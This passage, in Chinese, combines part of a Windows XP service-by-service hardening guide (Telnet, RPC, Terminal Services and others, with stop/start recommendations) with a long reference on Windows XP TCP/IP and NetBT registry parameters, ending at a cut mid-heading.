    NetDDE dsdm(网络动态数据交换网络共享服务)。管理动态数据交换(DDE)网络共享。该服务进程名为Netdde.exe。

    依存关系：Network DDE

    建议：如无需Network DDE服务，停止。

    13.Network Location Awareness
    NLA(网络位置识别服务)。收集并保存网络配置信息，并在信息改动时通知应用程序。该服务进程名为Svchost.exe。

    依存关系：AFD网络支持环境、TCP/IP Procotol Driver、Internet Connection Firewall(ICF)/ Internet Connection Sharing(ICS)

    建议：对于移动办公用户，启动。

    14.NT LM Security Support Provider
    NtlmSsp(NT LM安全性支持提供者服务)。为使用传输协议而不是命名管道的远程过程调用(RPC)程序提供安全机制。该服务进程名为Lsass.exe。

    依存关系：Telnet

    建议：如果不使用Message Queuing或Telnet Server服务，停止。

    15.QoS RSVP
    RSVP(QoS许可控制服务)。为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功能。该服务进程名为Rsvp.exe。

    依存关系：AFD网络支持环境、TCP/IP protocol Driver、Remote Procedure Call(RPC)

    建议：用来保留20%带宽的服务，如果你的网络卡不支持802.1P或在你计算机的网络中没有ACS server，停止。

    16.Remote Access Auto Connection Manager
    RasAuto(远程访问自动联机管理员服务)。无论什么时候当某个程序引用一个远程DNS、NetBIOS名或地址就创建一个到远程网络的连接。该服务进程名为Svchost.exe。

    依存关系：Remote Access Connection Manager、Telephony

    建议：如果你的机器提供网络共享服务就启动它，以避免网络断线后手动连接，否则停止。

    17.Remote Access Connection Manager
    RasMan(远程访问联机管理员服务)。创建网络连接。该服务进程名为Svchost.exe。

    依存关系：Telephony、Internet Connection Firewall(ICF)/ Internet Connection Sharing(ICS)、Remote Access Auto Connection Manager

    建议：根据具体情况而定。

    18.Remote Desktop Help Session Manager
    RDSessMgr(远程桌面协助服务)。管理并控制远程协助。如果此服务被终止，远程协助将不可用。终止此服务前，请参见“属性”对话框上的“依存”选项卡。该服务进程名为Sessmgr.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：用于管理和控制远程协助，如果不使用可以停止。

    19.Remote Procedure Call(RPC)
    RpcSs(远程过程调用)。提供终结点映射程序(endpoint mapper)以及其他RPC服务。该服务进程名为Svchost.exe。

    依存关系：相当多的服务均依赖于它的运行

    建议：很多服务都需要依存它运行，启动。

    20.Remote Procedure Call(RPC)Locator
    RpcLocator(远程过程调用定位服务)。管理RPC名称服务数据库。通过它对RPC的命名管理，调用者才能找到被调用者的位置。该服务进程名为Locator.exe。

    依存关系：Workstation

    建议：由于系统注册表的存在，使用命名管理并无实际意义，停止。

    21.Routing and Remote Access
    RemoteAccess(路由和远程访问服务)。在局域网以及广域网环境中提供路由服务。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)、NetBIOSGroup

    建议：提供拨号联机到广域网或是VPN服务，一般用户使用不到，停止。

    22.Secondary Logon
    Seclogon(二次登录服务)。在多用户使用的计算机上，某些用户因为是非管理员权限，导致某些程序无法执行。为了让没有管理员权限的已登录用户可以使用这个程序，Windows XP设计了这个功能来分配临时的管理员权限。该服务进程名为Svchost.exe。

    依存关系：无

    建议：基于安全性考虑，停止。

    23.Server
    lanmanserver(服务器服务)。支持此计算机通过网络的文件、打印、和命名管道共享。如果服务停止，这些功能不可用。该服务进程名为Svchost.exe。

    依存关系：Computer Browser

    建议：如果没有与其他计算机分享的需要，停止。

    24.TCP/IP NetBIOS Helper
    LmHosts(TCP/IP NetBIOS助手服务)。允许对“TCP/IP 上 NetBIOS(NetBT)”服务以及NetBIOS名称解析的支持。该服务进程名为Svchost.exe。

    依存关系：AFD 网络支持环境、NetBios Over TCP/IP

    建议：如果你的网络不使用NetBIOS或是WINS，停止。

    25.Telnet
    TlntSvr(远程登录服务)。允许远程用户登录到此计算机并运行程序，并支持多种TCP/IP Telnet客户，包括基于UNIX和Windows的计算机。该服务进程名为Tlntsvr.exe。

    依存关系：NT LM Security Support Provider、Remote Procedure Call(RPC)、TCP/IP Protocol Driver

    建议：基于安全性考虑，如无特别需求，停止。

    26.Terminal Services
    TermService(终端机服务)。允许多用户连接并控制一台计算机，并且在远程计算机上显示桌面和应用程序。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)、Fast User Switching Compatibility、InteractiveLogon

    建议：远程桌面或是远程协助的功能，如无特别需求，停止。

    27.Workstation
    Lanmanworkstation(工作站服务)。创建和维护到远程服务的客户端网络连接。该服务进程名为Svchost.exe。

    依存关系：Alerter、Background Intelligent Transfer Service、Computer Browser、Messenger、Net Logon、Remote Procedure Call(RPC)Locator

    建议：Internet网联机所必需的一些功能，启动。


Windows XP 的 TCP/IP 和 NBT 配置参数祥解

《一键清理系统垃圾》

Windows XP 的 TCP/IP 和 NBT 配置参数祥解

概要
本文详细说明了用于配置协议驱动程序 Tcpip.sys（它实现标准的 TCP/IP 网络协议）的所有注册表参数。
Windows XP 的 TCP/IP 协议套件实现可从注册表中读取它的所有配置数据。在安装过程中，这些信息是由“控制面板”中的“网络”工具写入注册表的。如果已启用动态主机配置协议 (DHCP) 客户服务，则 DHCP 客户服务也会提供这些信息中的部分内容。
在大多数环境中，仅使用由 DHCP 和“控制面板”中的“网络”工具收集的配置信息，就应该可以正确而高效地进行协议套件实现。这些协议的所有其他可配置方面的最佳默认值均已编码到驱动程序中。
客户安装中可能会有一些异常的情况，这时可更改某些默认值。为处理这些情况，可以创建可选的注册表参数，以修改协议驱动程序中某些部分的默认行为。 小心：Windows XP TCP/IP 实现在很大程度上是自优化的。如果未经仔细研究就调整注册表参数，可能会对系统性能造成不利影响。
更多信息
警告：注册表编辑器使用不当可导致严重问题，可能需要重新安装操作系统。Microsoft 不能保证可以解决因注册表使用不当所导致的问题。使用注册表编辑器需要您自担风险。
要更改这些参数，请采用下列步骤：
启动注册表编辑器 (Regedit.exe)。
从 HKEY_LOCAL_MACHINE 子树，转到以下项：
\SYSTEM\CurrentControlSet\Services
如下面相应的项中所述，向注册表项中添加一个值，方法是：在编辑菜单上单击添加值，键入一个值，然后在数据类型下设置该值的类型。
单击确定。
退出注册表编辑器。
重新启动计算机，以使更改生效。
所有 TCP/IP 参数都是注册表值，这些值分别位于以下两个不同子项中的某一个下：
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
Tcpip\Parameters
Tcpip\Parameters\Interfaces\适配器 ID
其中适配器 ID 表示 TCP/IP 绑定到的网络适配器。可通过检查 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\适配器 ID\Connection 来确定适配器 ID 和网络连接之间的关系。这些项中的 Name 值为“网络连接”文件夹中使用的网络连接提供友好名称。后面的注册表项下的值是特定于各个适配器的。同时具有 DHCP 和静态配置值的参数可能存在也可能不存在，具体取决于系统/适配器是不是用 DHCP 配置的，以及是不是已指定静态覆盖值。必须重新启动系统，这些参数的更改才能生效。

可使用注册表编辑器配置的标准参数
以下参数是安装 TCP/IP 组件期间由“控制面板”中的“网络”工具使用默认值安装的。可以使用注册表编辑器 (Regedit.exe) 修改它们。
DatabasePath
项：Tcpip\Parameters
数值类型：REG_EXPAND_SZ - 字符串
有效范围：有效的 Windows NT 文件路径
默认值：%SystemRoot%\System32\Drivers\Etc
说明：此参数指定标准 Internet 数据库文件（HOSTS、LMHOSTS、NETWORKS 和 PROTOCOLS）的路径。它是由 Windows 套接字接口使用的。
ForwardBroadcasts
项：Tcpip\Parameters
数值类型：REG_DWORD - 布尔值
有效范围：0 或 1（False 或 True）
默认值：0 (False)
说明：不支持转发广播。此参数被忽略。
UseZeroBroadcast
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型：REG_DWORD - 布尔值
有效范围：0 或 1（False 或 True）
默认值：0 (False)
说明：如果此参数设置为 1 (True)，IP 将使用全 0 广播 (0.0.0.0)，而不是全 1 广播 (255.255.255.255)。大多数系统都使用全 1 广播，但是某些从 BSD 实现派生的系统使用全 0 广播。使用不同广播的系统不能在同一网络上很好地互操作。
可使用注册表编辑器配置的可选参数
注册表中通常不存在这些参数。可以创建它们以修改 TCP/IP 协议驱动程序的默认行为。
ArpAlwaysSourceRoute
项：Tcpip\Parameters
数值类型：REG_DWORD - 布尔值
有效范围：0，1（False 或 True）
默认值：0 (False)
说明：将此参数设置为 1 会强制 TCP/IP 使用在令牌环网络上启用的源路由来传输 ARP 查询。默认情况下，堆栈首先在不使用源路由的情况下传输 ARP 查询，如果没有接到答复，则用源路由重试。
ArpUseEtherSNAP
项：Tcpip\Parameters
数值类型：REG_DWORD - 布尔值
有效范围：0，1（False 或 True）
默认值：0 (False)
说明：将此参数设置为 1 会强制 TCP/IP 使用 802.3 SNAP 编码传输 Ethernet 数据包。默认情况下，堆栈以 DIX Ethernet 格式传输数据包。但它始终能够接收这两种格式的数据包。
DefaultTTL
项：Tcpip\Parameters
数值类型：REG_DWORD - 秒/跃点
的数量
有效范围： 1-255
默认值：对于 Windows XP 为 128
说明：指定在传出 IP 数据包头中设置的“生存时间”(TTL) 值。TTL 决定了 IP 数据包在到达其目标前可以在网络中生存的最长时间。它有效限制了 IP 数据包在被丢弃前可以通过的路由器数。
EnableDeadGWDetect
项：Tcpip\Parameters
数值类型：REG_DWORD - 布尔值
有效范围：0，1（False，True）
默认值：1 (True)
说明：将此参数设置为 1 会使 TCP 执行死网关检查。启用了此功能后，如果几次重新发送片段都没有收到响应，TCP 会让 IP 更改到一个备份网关。可以在“网络”控制面板中“TCP/IP 配置”对话框的“高级”部分定义备份网关。
EnablePMTUBHDetect
项：Tcpip\Parameters
数值类型：REG_DWORD - 布尔值
有效范围：0，1（False，True）
默认值：0 (False)
说明：将此参数设置为 1 (True) 会使 TCP 在执行路径 MTU 发现时，尝试检测“黑洞”路由器。当“黑洞”路由器需要用 Don''t Fragment 位设置来碎片化 IP 数据报时，它不返回“无法到达 ICMP 目标”消息。TCP 依*接收这些消息来执行路径 MTU 发现。启用此功能后，如果几次重新发送片段都没有收到响应，TCP 将尝试在不设置 Don''t Fragment 位的情况下发送片段。如果收到片段响应，MSS 将降低并且以后在连接上传输的数据包中都会设置 Don''t Fragment 位。启用黑洞路由器检测可以增加为特定的片段执行重新发送的最大次数。
EnablePMTUDiscovery
项：Tcpip\Parameters
数值类型：REG_DWORD - 布尔值
有效范围：0，1（False，True）
默认值：1 (True)
说明：将此参数设置为 1 (True) 会使 TCP 尝试发现到达一个远程主机的路径上的“最大传输单元”（MTU 或最大数据包大小）。通过发现路径 MTU 并将 TCP 片段限制为此大小，TCP 可以消除此路径上使用不同的 MTU 连接网络的路由器上的碎片。碎片会对 TCP 吞吐量产生不利影响并造成网络拥塞。如果将此参数设置为 0，则对于不是指向本地子网上的计算机的所有连接，都使用 576 字节的 MTU。
ForwardBufferMemory
项：Tcpip\Parameters
数值类型：REG_DWORD - 字节数
有效范围：网络 MTU - 某个小于
0xFFFFFFFF 的合理值
默认值：74240（足以容纳 50 个 1480 字节大小的
数据包，舍入为 256 的倍数）
说明：此参数确定 IP 分配多少内存来存储路由器数据包队列中的数据包数据。当这个缓冲区空间已满时，路由器开始以随机方式从队列中丢弃数据包。数据包队列数据缓冲区的长度为 256 字节，所以此参数的值应是 256 的倍数。对于较大的数据包，多个缓冲区链接在一起。数据包的 IP 头分别存储。如果没有启用 IP 路由器，此参数将被忽略并且不会分配任何缓冲区。
IGMPLevel
项：Tcpip\Parameters
数值类型：REG_DWORD - 数字
有效范围： 0,1,2
默认值： 2
说明：此参数确定系统在多大程度上支持 IP 多址广播和参与 Internet 组管理协议。在级别 0，系统不提供多址广播支持。在级别 1，系统只可以发送 IP 多址广播数据包。在级别 2，系统可以发送 IP 多址广播数据包并完全参与 IGMP 以接收多址广播数据包。
KeepAliveInterval
项：Tcpip\Parameters
数值类型：REG_DWORD - 时间（以毫秒为单位）
有效范围：1 - 0xFFFFFFFF
默认值：1000（1 秒）
说明：此参数确定在收到响应之前，保活重传之间的时间间隔。一旦收到一个响应，将由 KeepAliveTime 值重新控制在下一次保活传输之前的延迟。如果经过 TcpMaxDataRetransmissions 指定的重新传输次数后仍无响应，将放弃连接。
KeepAliveTime
项：Tcpip\Parameters
数值类型：REG_DWORD - 时间（以毫秒为单位）
有效范围：1 - 0xFFFFFFFF
默认值：7,200,000（两个小时）
说明：此参数控制 TCP 试图通过发送保活数据包来验证空闲连接是否仍然保持的次数。如果远程系统仍然可以连接并且正在运行，它就会响应保活传输。默认情况下不发送保活数据包。应用程序可以在连接上启用此功能。
MTU
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型：REG_DWORD 数字
有效范围：68 - 底层网络的 MTU
默认值：0xFFFFFFFF
说明：此参数覆盖网络接口的默认“最大传输单元 (MTU)”。MTU 是可以在底层网络上传输的最大数据包大小（以字节为单位）。该大小包括传输头。请注意，IP 数据报可能跨多个数据包。大于底层网络默认值的值会导致传输使用网络默认 MTU。小于 68 的值会导致传输使用值为 68 的 MTU。
NumForwardPackets
项：Tcpip\Parameters
数值类型：REG_DWORD 数字
有效范围：1 - 某个小于
0xFFFFFFFF 的合理值 默认： 50
说明：此参数确定为路由器数据包队列分配的 IP 数据包报头的数量。当所有头都在使用中时，路由器开始以随机方式丢弃队列中的数据包。该值至少应该等于 ForwardBufferMemory 值除以连接到路由器的网络的最大 IP 数据大小。它不得大于 ForwardBufferMemory 值除以 256，因为每个数据包至少需要 256 字节的转发缓冲内存。某个给定的 ForwardBufferMemory 大小的转发数据包的最佳数目取决于网络上传输的流量的类型，此数目应介于上述两值之间。如果没有启用路由器，此参数将被忽略并且不会分配任何数据包报头。
TcpMaxConnectRetransmissions
项：Tcpip\Parameters
数值类型：REG_DWORD - 数字
有效范围：0 - 0xFFFFFFFF
默认值： 2
说明：此参数确定 TCP 放弃尝试前重新传输连接请求 (SYN) 的次数。在一个特定的连接尝试中，每次重新传输的超时都是上一次的两倍。初始超时值为三秒。
TcpMaxDataRetransmissions
项：Tcpip\Parameters
数值类型：REG_DWORD - 数字
有效范围：0 - 0xFFFFFFFF
默认值： 5
说明：此参数控制 TCP 放弃尝试前重新传输个别数据片段（非连接片段）的次数。在一次连接中，每次重新连接的超时都是上一次的两倍。当响应恢复时，超时值将重置。基本超时值是根据连接上测定的往返时间动态确定的。
TcpNumConnections
项：Tcpip\Parameters
数值类型：REG_DWORD - 数字
有效范围：0 - 0xfffffe
默认值：0xfffffe
说明：此参数限制 TCP 能同时打开的最大连接数。
TcpTimedWaitDelay
项：Tcpip\Parameters
数值类型：REG_DWORD - 时间（以秒为单位）
有效范围：30-300（十进制）
默认值：0xF0（十进制 240）
说明：此参数确定连接被关闭时，它停留在 TIME_WAIT 状态的时间长度。当连接处于 TIME_WAIT 状态时，不能重新使用套接字对。这也称为“2MSL”状态，因为根据 RFC，此值应该是网络上最大片段生命周期的两倍。有关更多信息，请参阅 RFC793。
TcpUseRFC1122UrgentPointer
项：Tcpip\Parameters
数值类型：REG_DWORD - 布尔值
有效范围：0，1（False，True）
默认值：0 (False)
说明：此参数确定 TCP 是使用紧急数据 RFC 1122 规范，还是使用 BSD 派生的系统所使用的模式。这两种机制以不同的方式对 TCP 头中的紧急指针和紧急数据的长度进行解释。它们是不可交互的。Windows XP 默认为 BSD 模式。
TcpWindowSize
项：Tcpip\Parameters
数值类型：REG_DWORD - 字节数
有效范围：0 - 0xFFFF
默认值：0xFFFF
与
（网络中最大 TCP 数据大小的四倍
与
8192 向上舍入到网络 TCP 数据大小的偶数倍数两者之较大者）两者之中的较小者
对于以太网，默认值是 8760。
说明：此参数确定系统提供的最大 TCP 接收窗口大小。此接收窗口指定发送方在没有收到确认时可以传输的字节数。一般说来，较大的接收窗口可提高高端（延迟 * 带宽）网络的性能。为获得最高效率，接收窗口应该是 TCP 最大片段大小 (MSS) 的偶数倍数。
可通过网络连接属性配置的参数
以下参数由连接属性接口根据用户提供的信息自动创建和修改。不必直接在注册表中配置它们。
DefaultGateway
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型：REG_MULTI_SZ - 点分十进制 IP 地址列表
有效范围：任何有效的 IP 地址集
默认值：无
说明：此参数指定用于路由以下数据包的网关列表：这些数据包不是发往与计算机直接连接的子网，而且对于它们不存在更明确的路径。如果此参数有一个有效值，它将覆盖 DhcpDefaultGateway 参数。
域
项：Tcpip\Parameters
数值类型：REG_SZ - 字符串
有效范围：任何有效的 DNS 域名
默认值：无
说明：此参数指定系统的 DNS 域名。它是由 Windows 套接字接口使用的。
EnableDhcp
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型：REG_DWORD - 布尔值
有效范围：0 或 1（False 或 True）
默认值：0 (False)
说明：如果此参数设置为 1 (True)，DHCP 客户服务将尝试使用 DHCP 配置适配器上的第一个 IP 接口。
Hostname
项：Tcpip\Parameters
数值类型：REG_SZ - 字符串
有效范围：任何有效的 DNS 主机名
默认值：系统的计算机名
说明：此参数指定系统的 DNS 主机名，该主机名可由 hostname 命令返回。
IPAddress
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型：REG_MULTI_SZ - 点分十进制 IP 地址的列表
有效范围：任何有效的 IP 地址集
默认值：无
说明：此参数指定将绑定到适配器的 IP 接口的 IP 地址。如果列表中的第一个地址是 0.0.0.0，则适配器上的主接口将从 DHCP 配置。适配器具有多个 IP 接口的系统称为“逻辑多宿主”系统。在 SubnetMask 参数中，在此参数中指定的每个 IP 地址都必须有一个有效的子网掩码值。
IPEnableRouter
项：Tcpip\Parameters
数值类型：REG_DWORD - 布尔值
有效范围：0 或 1（False 或 True）
默认值：0 (False)
说明：将此参数设置为 1 (True) 将使系统在它连接到的网络之间路由 IP 数据包。
NameServer
项：Tcpip\Parameters
数值类型：REG_SZ - 空格分隔的点分十进制 IP 地址列表
有效范围：任何有效的 IP 地址集
默认值：无（空白）
说明：此参数指定 Windows 套接字解析名称时所查询的 DNS 名称服务器。
SearchList
项：Tcpip\Parameters
数值类型：REG_SZ - DNS 域名后缀的分隔列表
有效范围：任何有效的 DNS 域名后缀集合
有效范围：任何有效的 DNS 域名后缀集合
默认值：无
说明：此参数指定一个域名后缀列表，如果解析未修饰的名称失败，这些域名后缀将附加到由 DNS 解析的名称中。默认情况下，只附加 Domain 参数值。该参数是由 Windows 套接字接口使用的。
SubnetMask
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型：REG_MULTI_SZ - 点分十进制 IP 地址列表
有效范围：任何有效 IP 地址的集合。
默认值：无
说明：此参数指定与绑定到适配器的 IP 接口一起使用的子网掩码。如果列表中的第一个掩码是 0.0.0.0，则适配器上的主接口将由 DHCP 配置。在此参数中，在 IPAddress 参数中指定的每个 IP 地址都必须有一个有效的子网掩码值。
不可配置的参数
以下参数由 TCP/IP 组件在内部创建和使用。无法使用注册表编辑器来修改它们。下面列出它们仅供参考。
DhcpDefaultGateway
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型：REG_MULTI_SZ - 点分十进制 IP 地址列表
有效范围：任何有效的 IP 地址集
默认值：无
说明：此参数指定用于路由以下数据包的默认网关列表：这些数据包不是发往与计算机直接连接的子网，而且对于它们不存在更明确的路径。此参数是由 DHCP 客户服务（如果启用的话）写入的。此参数被有效的 DefaultGateway 参数值覆盖。
DhcpIPAddress
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型：REG_SZ - 点分十进制 IP 地址
有效范围：任何有效的 IP 地址
默认值：无
说明：此参数为接口指定由 DHCP 配置的 IP 地址。如果 IPAddress 参数中包含的第一个值不是 0.0.0.0，该值将覆盖此参数。
DhcpNameServer
项：Tcpip\Parameters
数值类型：REG_SZ - 空格分隔的点分十进制 IP 地址列表
有效范围：任何有效的 IP 地址集
默认值：无
说明：此参数指定 Windows 套接字解析名称时所查询的 DNS 名称服务器。它是由 DHCP 客户端服务写入的（如果启用的话）。如果 NameServer 参数有一个有效值，该值将覆盖此参数。
DhcpServer
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型：REG_SZ - 点分十进制 IP 地址
有效范围：任何有效的 IP 地址
默认值：无
说明：此参数指定向 DhcpIPAddress 参数中的 IP 地址授予租约的 DHCP 服务器的 IP 地址。
DhcpSubnetMask
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型：REG_SZ - 点分十进制 IP 子网掩码
有效范围：对已配置的 IP 地址有效的任何子网掩码
默认值：无
说明：此参数为 DhcpIPAddress 参数中指定的地址指定由 DHCP 配置的子网掩码。
IPInterfaceContext
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型： REG_DWORD
有效范围：0 - 0xFFFFFFFF
默认值：无
说明：此参数由 TCP/IP 驱动程序写入以供 DHCP 客户服务使用。
Lease
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型：REG_DWORD - 时间（以秒为单位）
有效范围：1 - 0xFFFFFFFF
默认值：无
说明：DHCP 客户服务使用此参数存储该适配器的 IP 地址租约的有效时间（以秒为单位）。
LeaseObtainedTime
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型：REG_DWORD - 自 1/1/70 午夜算起的绝对时间（秒）
有效范围：1 - 0xFFFFFFFF
默认值：无
说明：DHCP 客户服务使用此参数存储获得该适配器的 IP 地址租约的时间。
LeaseTerminatesTime
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型：REG_DWORD - 自 1/1/70 午夜算起的绝对时间（秒）
有效范围：1 - 0xFFFFFFFF
默认值：无
说明：DHCP 客户服务使用此参数存储该适配器的 IP 地址租约的失效时间。
LLInterface
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型：REG_SZ - NT 设备名称
有效范围：合法的 NT 设备名称
默认值：空字符串（空白）
说明：此参数用于引导 IP 绑定到与内置 ARP 模块不同的链接层协议。此参数的值是 IP 应绑定到的基于 Windows NT 的设备的名称。例如，此参数与 RAS 组件一起使用。
T1
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型：REG_DWORD - 自 1/1/70 午夜算起的绝对时间（秒）
有效范围：1 - 0xFFFFFFFF
默认值：无
说明：DHCP 客户服务使用此参数存储该服务首次试图续订适配器的 IP 地址租约的时间（通过与授予此租约的服务器联系）。
T2
项：Tcpip\Parameters\Interfaces\适配器 ID
数值类型：REG_DWORD - 自 1/1/70 午夜算起的绝对时间（秒）
有效范围：1 - 0xFFFFFFFF
默认值：无
说明：DHCP 客户服务使用此参数存储该服务试图续订适配器的 IP 地址租约的时间（通过广播续订请求）。仅当由于某种原因服务无法用原始服务器续订租约时，才应到达时间 T2。
NBT
所有 NBT 参数都是注册表值，并且位于以下两个不同子项的其中一个下：
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
Netbt\Parameters
Netbt\Parameters\Interfaces\Tcpip_适配器 ID
（其中 适配器 ID 表示 NBT 绑定到的网络适配器）。可通过检查 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\适配器 ID\Connection 来确定适配器 ID 和网络连接之间的关系。这些项中的 Name 值为“网络连接”文件夹中的网络连接提供名称。 后一个注册表项下的值是特定于各个适配器的。。如果系统是通过 DHCP 配置的，那么在命令外壳程序中发送 ipconfig /renew 命令时，参数的更改将生效。否则，必须重新启动计算机，这些参数的更改才能生效。
可通过注册表编辑器配置的标准参数
以下参数是安装 TCP/IP 组件期间由“控制面板”中的“网络”工具使用默认值安装的。可以用注册表编辑器 (Regedit.exe) 修改它们。
BcastNameQueryCount
项：Netbt\Parameters
数值类型：REG_DWORD - 计数
有效范围：1 到 0xFFFF
默认值： 3
说明：此值确定在未收到响应时，NetBT 广播给定名称查询的次数。
BcastQueryTimeout
项：Netbt\Parameters
数值类型：REG_DWORD - 时间（以毫秒为单位）
有效范围：100 到 0xFFFFFFFF
默认值：0x2ee（十进制 750）
说明：此值确定对同一名称进行的连续广播名称查询之间的时间间隔。
CacheTimeout
项：Netbt\Parameters
数值类型：REG_DWORD - 时间（以毫秒为单位）
有效范围：60000 到 0xFFFFFFFF
默认值：0x927c0（600000 毫秒 = 10 分钟）
说明：此值确定名称缓存在远程名称表中的时间间隔。
NameServerPort
项：Netbt\Parameters
数值类型：REG_DWORD - UDP 端口号
有效范围：0 - 0xFFFF
默认值：0x89
说明：此参数确定 NetBT 将与名称服务相关的数据包（例如，对 WINS 的名称查询和名称注册）发送到哪一个目标端口号，。Microsoft WINS 在端口 0x89 上侦听。其他供应商提供的 NetBIOS 名称服务器可以在不同的端口上侦听。
NameSrvQueryCount
项：Netbt\Parameters
数值类型：REG_DWORD - 计数
有效范围：0 - 0xFFFF
默认值： 3
说明：此值确定在未接到响应时，NetBT 向 WINS 服务器发送一个给定名称的查询的次数。
NameSrvQueryTimeout
项：Netbt\Parameters
数值类型：REG_DWORD - 时间（以毫秒为单位）
有效范围：100 - 0xFFFFFFFF
默认值：1500（1.5 秒）
说明：此值确定对一个给定的名称进行连续 WINS 名称查询的时间间隔。
SessionKeepAlive
项：Netbt\Parameters
数值类型：REG_DWORD - 时间（以毫秒为单位）
有效范围：60,000 - 0xFFFFFFFF
默认值：3,600,000（1 小时）
说明：此值确定会话上各保活传输之间的时间间隔。将此值设置为 0xFFFFFFF 可禁用保活传输。
Size/Small/Medium/Large
项：Netbt\Parameters
数值类型： REG_DWORD
有效范围：1、2、3（小、中、大）
默认值：1（小）
说明：此值确定用于存储本地和远程名称的名称表大小。通常，“小”就足够了。如果系统充当代理名称服务器，此值自动设置为“大”以增加名称缓存哈希表的大小。哈希表存储桶的大小如下：大：256 中：128 小： 16
可通过注册表编辑器配置的可选参数
注册表中通常不存在这些参数。可以创建它们以修改 NetBT 协议驱动程序的默认行为。
BroadcastAddress
项：Netbt\Parameters
数值类型：REG_DWORD - Little-Endian 编码的四字节 IP 地址
有效范围：0 - 0xFFFFFFFF
默认值：每个网络的全 1 广播地址。
说明：此参数可用于强制 NetBT 对所有与广播名称相关的数据包使用指定的地址。默认情况下，NetBT 使用适合于每个网络的全 1 广播地址（也就是说，对于子网掩码为 255.255.0.0 的网络 11.101.0.0，其子网广播地址为 11.101.255.255）。如果网络使用全 0 广播地址，则需要重新设置此参数（通过使用 UseZeroBroadcast TCP/IP 参数进行设置）。在上面的示例中，合适的子网广播地址是 11.101.0.0。此参数将设置为 0x0b650000。请注意，此参数是全局性的，将在 NetBT 绑定到的所有子网上使用。
EnableProxyRegCheck
项：Netbt\Parameters
数值类型：REG_DWORD - 布尔值
有效范围：0 或 1（False 或 True）
默认值：0 (False)
说明：如果此参数设置为 1 (True)，并且名称已经向 WINS 注册或者以一个不同的 IP 地址存在于代理的本地名称缓存中，则代理名称服务器将对广播名称注册发送否定响应。启用此功能的风险在于：只要 WINS 有名称的映射，就会阻止系统更改它的 IP 地址。因此，默认情况下禁用它。
InitialRefreshT.O.
项：Netbt\Parameters
数值类型：REG_DWORD - 时间（以毫秒为单位）
有效范围：960000 - 0xFFFFFFF
默认值：960000（16 分钟）
说明：此参数指定在名称注册过程中由 NBT 使用的初始刷新超时。当 NBT 首次注册名称时，将在此时间间隔的 1/8 处尝试联系 WINS 服务器。当接收到成功注册响应时，此响应包含要使用的新的刷新间隔。
LmhostsTimeout
项：Netbt\Parameters
数值类型：REG_DWORD - 时间（以毫秒为单位）
有效范围：1000 - 0xFFFFFFFF
默认值：6000（6 秒）
说明：此参数为 LMHOSTS 和 DNS 名称查询指定超时值。计时器有一个超时值粒度，因此实际的超时可能是该值的两倍。
MaxDgramBuffering
项：Netbt\Parameters
数值类型：REG_DWORD - 字节数
有效范围：0 - 0xFFFFFFFF
默认值：0x20000 (128 Kb)
说明：此参数指定 NetBT 为所有未处理的 IP 数据报发送动态分配的最大内存量。在达到此限制之后，进一步的发送操作将由于资源不足而失败。
NodeType
项：Netbt\Parameters
数值类型：REG_DWORD - 数字
有效范围：1、2、4、8（B 节点、P 节点、M 节点、H 节点）
默认值：1 或 8（基于 WINS 服务器配置）
说明：此参数确定 NetBT 使用什么方法来注册和解析名称。B 节点系统使用广播。P 节点系统只使用对名称服务器 (WINS) 的点对点名称查询。M 节点系统先广播，然后查询名称服务器。H 节点系统首先查询名称服务器，然后广播。通过 LMHOSTS 和（或）DNS 的解析（如果被启用）遵循这些方法。如果存在此项，它将覆盖 DhcpNodeType 项。如果这两个项都不存在，并且没有为网络配置 WINS 服务器，则系统默认为 B 节点。如果至少配置了一台 WINS 服务器，则系统默认为 H 节点。
RandomAdapter
项：Netbt\Parameters
数值类型：REG_DWORD - 布尔值
有效范围：0 或 1（False 或 True）
默认值：0 (False)
说明：此参数仅适用于多宿主主机。如果将它设置为 1 (True)，NetBT 将从它的所有绑定接口中随机选择放到名称查询响应中的 IP 地址。响应中通常包含查询到达的接口地址。有两个接口在同一个网络上的服务器将使用此功能来实现负载平衡。
RefreshOpCode
项：Netbt\Parameters
数值类型：REG_DWORD - 数字
有效范围： 8、9
默认值： 8
说明：此参数强制 NetBT 在名称刷新数据包中使用一个特定的操作码。NetBT 协议的规范在这方面有些模糊。虽然由 Microsoft 实现所使用的默认值 8 看起来像所需的值，但其他一些实现（如 Ungermann-Bass 完成的实现）使用值 9。两个实现必须使用相同的操作码才能相互操作。
SingleResponse
项：Netbt\Parameters
数值类型：REG_DWORD - 布尔值
有效范围：0 或 1（False 或 True）
默认值：0 (False)
说明：此参数仅适用于多宿主主机。如果此参数设置为 1 (True)，则 NBT 仅在名称查询响应中提供它的绑定接口之一的 IP 地址。默认情况下包括所有绑定接口的地址。
WinsDownTimeout
项：Netbt\Parameters
数值类型：REG_DWORD - 时间（以毫秒为单位）
有效范围：1000 - 0xFFFFFFFF
默认值：15,000（15 秒）
说明：此参数确定 NBT 在联系任何 WINS 服务器失败之后等待多长时间再次尝试使用 WINS。此功能主要允许暂时从网络上断开的计算机（如便携式计算机）继续完成启动过程，而不会等到每个 WINS 名称注册或查询分别超时。
可从连接属性配置的参数
